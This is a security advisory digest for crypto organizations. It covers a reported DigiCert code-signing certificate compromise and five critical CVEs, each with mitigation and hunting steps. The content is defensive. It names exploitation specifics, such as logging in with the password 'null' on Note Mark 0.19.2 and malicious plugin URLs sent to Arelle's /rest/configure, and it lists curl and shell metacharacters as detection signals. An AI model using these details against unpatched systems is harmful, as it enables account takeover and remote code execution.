In the last 24 hours, 6 notable items were detected (6 critical, 0 high, 0 moderate). Top highlights: DigiCert Hacked via Weaponized Screensaver File to Obtain EV Code Signing Certificates · CVE-2026-41571: Note Mark is an open-source note-taking application. In version 0.19.2, IsPasswordMatch in backend/db/models.go falls back to a hard-coded bcrypt("null") placeholder whenever a user has no stored password. OIDC-registered users are created · CVE-2026-42088: OpenC3 COSMOS provides the functionality needed to send commands to and receive data from one or more embedded systems. Prior to version 7.0.0-rc3, the Script Runner widget allows users to execute Python and Ruby scripts directly from the o.
Top Highlights
A threat actor reportedly compromised DigiCert support staff with a weaponized screensaver file and used stolen EV code signing certificates to distribute Zhong Stealer malware.
Abused EV code signing certificates can undermine endpoint trust decisions and enable malware to evade reputation-based controls. Organizations should assume signed binaries are not inherently safe and validate certificate provenance, signer reputation, and behavioral telemetry.
- Hunt for Zhong Stealer indicators, suspicious signed binaries, and recently introduced executables signed with DigiCert EV code signing certificates.
- Review endpoint telemetry for execution of .scr files, ZIP attachments from support/chat workflows, and anomalous child processes from browsers, chat tools, or archive utilities.
- Increase scrutiny of newly observed signed binaries across Windows endpoints, especially those with low prevalence, unusual paths, or network connections to unknown infrastructure.
- Validate Okta, Google Workspace, Microsoft 365, GitLab, AWS, and Slack logs for credential theft indicators, suspicious sessions, MFA fatigue, token use, and impossible travel.
CVE-2026-41571 allows unauthenticated takeover of OIDC-created Note Mark users by logging in with the password value "null" in version 0.19.2.
Crypto organizations commonly rely on OIDC/SSO for internal tools; bypassing it can expose notes, operational procedures, secrets, incident records, or customer-sensitive data. If Note Mark is internet-accessible, exploitation could be rapid and low-noise.
- Upgrade Note Mark from version 0.19.2 to 0.19.3 or later immediately.
- Review Note Mark authentication logs for internal login attempts using password value "null" or unusual sessions for OIDC-created users.
- Invalidate active Note Mark sessions after patching and monitor for suspicious access to sensitive notes or assets.
CVE-2026-42088 lets non-admin OpenC3 COSMOS script users bypass API permissions and perform administrative actions across shared Docker services.
Crypto organizations with embedded, hardware, or operational technology workflows could see secrets, logs, plugins, and system command configurations altered by a lower-privileged user. Administrative bypass in a command-and-control platform can create safety, integrity, and operational disruption risks.
- Upgrade OpenC3 COSMOS to version 7.0.0-rc3 or later immediately.
- Review Script Runner permissions and audit scripts run by non-admin users for direct Redis, bucket service, or internal container network access.
- Monitor COSMOS Redis, bucket service, configuration, plugin, and settings changes for unauthorized modifications or suspicious script-originated activity.
CVE-2026-42796 allows unauthenticated remote code execution in Arelle before 2.39.10 via malicious plugin URLs passed to /rest/configure.
Crypto organizations may use XBRL or reporting tooling for finance, audit, compliance, or regulatory workflows. Compromise of Arelle could expose financial data, credentials, reports, or provide a foothold into internal systems.
- Upgrade Arelle to version 2.39.10 or later immediately.
- Identify any exposed Arelle webserver instances and review /rest/configure access logs for plugins parameters referencing external URLs or unexpected Python files.
- Monitor Arelle hosts for new plugin files, unexpected outbound downloads, Python child activity, and suspicious process or network behavior.
CVE-2026-42076 is a command injection vulnerability in Evolver before 1.69.3 that can allow arbitrary shell command execution via _extractLLM().
In a crypto environment, RCE in agent infrastructure can expose secrets, cloud credentials, source code, wallets, signing services, or internal systems. Agent runtimes often have broad integration access, making rapid inventory, patching, and compromise review important.
- Identify any Evolver deployments in agentic automation, servers, developer tooling, or CI/CD and check for versions before 1.69.3.
- Upgrade Evolver to version 1.69.3 or later to remediate command injection in _extractLLM().
- Review process, shell, EDR, and network telemetry for suspicious curl, execSync, shell metacharacter use, or unexpected child processes from Evolver runtimes.
CVE-2026-26956 is a full vm2 sandbox escape in version 3.10.4 that allows attacker code to execute arbitrary host commands.
Crypto organizations may use Node.js sandboxes in automation, plugin systems, CI/CD, bots, or agentic workflows, where host compromise could expose secrets, source code, signing material, cloud credentials, or production access. Any service executing untrusted JavaScript through vm2 3.10.4 should be treated as high-risk until patched and reviewed.
- Search codebases, lockfiles, containers, and runtime dependency inventories for vm2 version 3.10.4, especially services executing untrusted JavaScript.
- Upgrade vm2 to version 3.10.5 or later and redeploy affected Node.js services and containers.
- Review logs, EDR, process trees, and network telemetry for unexpected child processes, shell commands, or outbound connections from Node.js services using vm2.